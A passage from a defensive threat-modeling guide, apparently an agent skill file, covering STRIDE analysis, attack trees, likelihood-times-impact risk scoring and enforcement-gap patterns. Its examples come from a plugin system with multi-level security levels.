1. **List all layers** where property matters
2. **Ask per layer**: "Can attacker bypass this layer?"
3. **Design defense-in-depth**: Redundant checks at multiple layers
## Risk Scoring
**Purpose**: Prioritize threats by (Likelihood × Impact)
### Likelihood Scale
| Score | Likelihood | Criteria |
|-------|-----------|----------|
| **3** | High | Easy to exploit, attacker has means and motive, no special access needed |
| **2** | Medium | Requires some skill or access, exploit path exists but not trivial |
| **1** | Low | Requires significant expertise, insider access, or rare conditions |
### Impact Scale
| Score | Impact | Criteria |
|-------|--------|----------|
| **3** | High | Complete system compromise, data breach, financial loss, safety risk |
| **2** | Medium | Partial compromise, limited data exposure, service degradation |
| **1** | Low | Minor information leakage, temporary DoS, limited scope |
### Risk Matrix
```
IMPACT
1 2 3
┌───┬───┬───┐
3 │ M │ H │ C │ C = Critical (fix immediately)
L 2 │ L │ M │ H │ H = High (fix before launch)
I 1 │ L │ L │ M │ M = Medium (fix soon)
K └───┴───┴───┘ L = Low (fix if time permits)
```
### Example: VULN-004 Config Override
- **Likelihood**: 3 (High) - YAML files easily modified with filesystem access
- **Impact**: 3 (High) - Bypass MLS enforcement, access classified data
- **Risk Score**: 9 (Critical) - **Fix immediately**
### Example: ADR-004 Type System Bypass
- **Likelihood**: 2 (Medium) - Requires knowing to create duck-typed plugin
- **Impact**: 3 (High) - Complete security bypass
- **Risk Score**: 6 (High) - **Fix before launch**
## Threat Modeling Workflow
### Step 1: System Decomposition
Break system into components:
1. **Entry points**: APIs, file uploads, configuration, user input
2. **Data stores**: Databases, caches, logs, files
3. **External dependencies**: Third-party APIs, libraries, services
4. **Trust boundaries**: Where privilege level changes, network boundaries
5. **Security-critical components**: Auth, access control, crypto, secrets management
### Step 2: Apply STRIDE per Component
For EACH component/interface, systematically ask STRIDE questions:
**Example: Plugin Configuration Component**
| STRIDE | Threat Found | Priority |
|--------|-------------|----------|
| **S** | None (no identity claims) | - |
| **T** | Config tampering to override security_level (VULN-004) | Critical |
| **R** | Config changes not logged | Medium |
| **I** | Config may contain secrets in plaintext | High |
| **D** | Malformed YAML causes parser crash | Low |
| **E** | Config override elevates plugin privilege | Critical |
### Step 3: Build Attack Trees
For each high-priority threat, construct attack tree:
- Goal: What does attacker want?
- Vectors: How could they get it?
- Exploits: Specific technical steps
Mark easiest paths with ⭐.
### Step 4: Check Enforcement Gaps
For each security property (authentication, authorization, encryption):
1. List enforcement layers (schema, registry, runtime, etc.)
2. Check each layer for gaps
3. Design redundant checks (defense-in-depth)
### Step 5: Score and Prioritize
- Calculate Likelihood × Impact for each threat
- Sort by risk score (highest first)
- Set mitigation deadlines (Critical → immediate, High → before launch)
### Step 6: Document Threats
Create threat model document:
```markdown
# Threat Model: [System Name]
## Scope
[Components, entry points, trust boundaries]
## Threats Identified
### THREAT-001: Configuration Override Attack (CRITICAL)
**STRIDE**: Tampering, Elevation of Privilege
**Attack Tree**: [Include tree diagram or text description]
**Risk Score**: 9 (L:3 × I:3)
**Mitigation**: Forbid security_level in config (schema), runtime verification, frozen dataclass
### THREAT-002: [Next threat...]
## Enforcement Gaps
[List gaps found in defense-in-depth analysis]
## Risk Matrix
[Include prioritized threat list]
```
## Common Patterns That Intuition Misses
### Pattern 1: Property Override via Configuration
**Symptom**: Security property declared in code, but configuration system allows overriding it
**Example**: VULN-004 - Plugin declares security_level in code, YAML config overrides it
**How to Spot**:
- Code declares security property (access_level, security_level, role)
- Configuration system loads external data (YAML, JSON, database)
- No explicit check that config cannot override security properties
**Mitigation**: Schema MUST forbid security properties in config, runtime verification
### Pattern 2: Enforcement at One Layer Only
**Symptom**: Security check at one layer, but attacker can bypass that layer
**Example**: ADR-003 - MLS checks assume plugin is registered, but no check that plugin IS registered
**How to Spot**:
- Security check at schema/type layer but not runtime
- Trust in single source of truth (registry, type system) without verification
- No redundant checks
**Mitigation**: Defense-in-depth - check at schema, registry, runtime, post-operation
### Pattern 3: Type System as Security Boundary
**Symptom**: Relying on type system (Protocol, interface) for security enforcement
**Example**: ADR-004 - Protocol typing allows duck typing to bypass BasePlugin
**How to Spot**:
- Security property defined in Protocol or interface
- No nominal type enforcement (isinstance check, ABC)
- Runtime doesn't verify actual type, just duck typing compatibility
**Mitigation**: Use ABC with sealed methods, runtime isinstance checks
### Pattern 4: Trusted Component Assumptions
**Symptom**: Assuming high-privilege component will never be compromised
**Example**: ADR-005 - Trusted downgrade assumes high-clearance component is always safe
**How to Spot**:
- Component granted special privileges ("trusted")
- No monitoring or verification of trusted component behavior
- Insider threat or supply chain compromise not in threat model
**Mitigation**: Trust but verify - log all actions, anomaly detection, strict mode without trust
### Pattern 5: Immutability Assumption
**Symptom**: Assuming language feature (frozen, const, final) provides security
**Example**: VULN-009 - Frozen dataclass but __dict__ bypass possible
**How to Spot**:
- Security property marked frozen/immutable via language feature
- No runtime check that property hasn't changed
- Language feature has known bypasses (__dict__, __setattr__)
**Mitigation**: Language feature + runtime verification + test all bypass methods
## Quick Reference Checklist
**Use this checklist for every threat modeling session:**
### Pre-Session
- [ ] Identify scope (components, entry points, trust boundaries)
- [ ] Gather architecture diagrams, API specs, data flow diagrams
### STRIDE Application
- [ ] Apply S.T.R.I.D.E to EVERY component/interface
- [ ] Document threats found per category
- [ ] Check for property override patterns
- [ ] Check for enforcement gap patterns
### Attack Trees
- [ ] Build attack tree for each high-priority threat
- [ ] Mark easiest exploitation paths
- [ ] Identify pre-requisites (what attacker needs)
### Risk Scoring
- [ ] Score Likelihood (1-3) for each threat
- [ ] Score Impact (1-3) for each threat
- [ ] Calculate Risk = L × I
- [ ] Prioritize by risk score
### Enforcement Gaps
- [ ] List security properties (auth, authorization, encryption, etc.)
- [ ] For each property, check: Schema? Registry? Runtime? Post-op?
- [ ] Identify gaps in defense-in-depth
### Documentation
- [ ] Create threat model document
- [ ] Include attack trees, risk matrix, mitigation plans
- [ ] Share with team for review
## Common Mistakes
### ❌ Intuitive Threat Finding Only
**Wrong**: "I'll just think about what could go wrong"
**Right**: Systematically apply STRIDE to every component
**Why**: Intuition finds obvious threats. STRIDE finds subtle, critical threats like VULN-004.
### ❌ Threat Modeling After Implementation
**Wrong**: "Let's build it first, then threat model"
**Right**: Threat model BEFORE implementation
**Why**: Threats found post-implementation require expensive re-architecture. Threats found in design are cheap to fix.
### ❌ Single-Layer Validation
**Wrong**: "Schema validates config, so it's secure"
**Right**: Validate at schema, registry, runtime, post-operation
**Why**: Attackers bypass single layers. Defense-in-depth catches them.
### ❌ Trusting Language Features for Security
**Wrong**: "It's frozen=True, so it can't be modified"
**Right**: Language feature + runtime verification + test bypass methods
**Why**: Language features have bypasses (VULN-009). Always verify.
### ❌ Skipping Risk Scoring
**Wrong**: "All threats are important, fix them all"
**Right**: Score L×I, prioritize Critical/High, fix Low only if time permits
**Why**: Resources are limited. Critical threats must be fixed first.
## Real-World Examples
### Example 1: VULN-004 - Configuration Override Attack
**System**: Plugin system with YAML configuration and MLS security levels
**STRIDE Analysis**:
- **T** (Tampering): Config file tampering ✓
- **E** (Elevation): Override security_level property ✓ **← Caught by STRIDE**
**Attack Tree**:
```
Goal: Access classified data
└─ Override security_level to SECRET
├─ Inject security_level: SECRET into YAML ⭐ (easiest)
├─ Modify source code (harder)
└─ Compromise plugin registry (harder)
```
**Risk Score**: L:3 × I:3 = 9 (Critical)
**Mitigation**: Forbid security_level in config schema + runtime verification
### Example 2: ADR-002 → 005 - MLS Design Gaps
**System**: Multi-Level Security enforcement for plugins
**Enforcement Gap Analysis**:
1. **Registry Layer**: No check plugin is registered (ADR-003) ✓
2. **Type Layer**: Protocol allows duck typing (ADR-004) ✓
3. **Immutability**: security_level could be mutated (VULN-009) ✓
4. **Trust**: Trusted downgrade assumes no compromise (ADR-005) ✓
**All four gaps found by systematic enforcement analysis** - would have prevented 3 follow-up ADRs.
**Risk Scores**:
- ADR-003 (registry): L:2 × I:3 = 6 (High)
- ADR-004 (type): L:2 × I:3 = 6 (High)
- ADR-005 (trust): L:1 × I:3 = 3 (Medium)
## When NOT to Threat Model
**Don't threat model for**:
- Non-security features (UI styling, analytics dashboards with no sensitive data)
- Changes that don't touch attack surface (refactoring internal code, renaming variables)
- Systems with no sensitive data and no attack value (internal dev tools, prototypes)
**Quick test**: If attacker can't gain anything (data, money, access, disruption), threat modeling may be overkill.
## Cross-References
### Load These Skills Together
**For comprehensive security**:
- `ordis/security-architect/threat-modeling` (this skill) - Find threats
- `ordis/security-architect/security-controls-design` - Design mitigations
- `ordis/security-architect/secure-by-design-patterns` - Prevent threats at architecture level
**For documentation**:
- `ordis/security-architect/documenting-threats-and-controls` - Document threat model
- `muna/technical-writer/documentation-structure` - Structure threat docs as ADRs
## Summary
**Threat modeling IS systematic threat discovery using STRIDE, attack trees, and risk scoring.**
**Key Principles**:
1. **STRIDE every component** - systematic beats intuition
2. **Build attack trees** - find easiest exploitation paths
3. **Check enforcement gaps** - defense-in-depth at every layer
4. **Score risks** - L × I prioritization
5. **Do it early** - before implementation, when fixes are cheap
**Meta-rule**: If you're designing something security-sensitive and you haven't threat modeled it, you've missed critical threats. Always threat model first.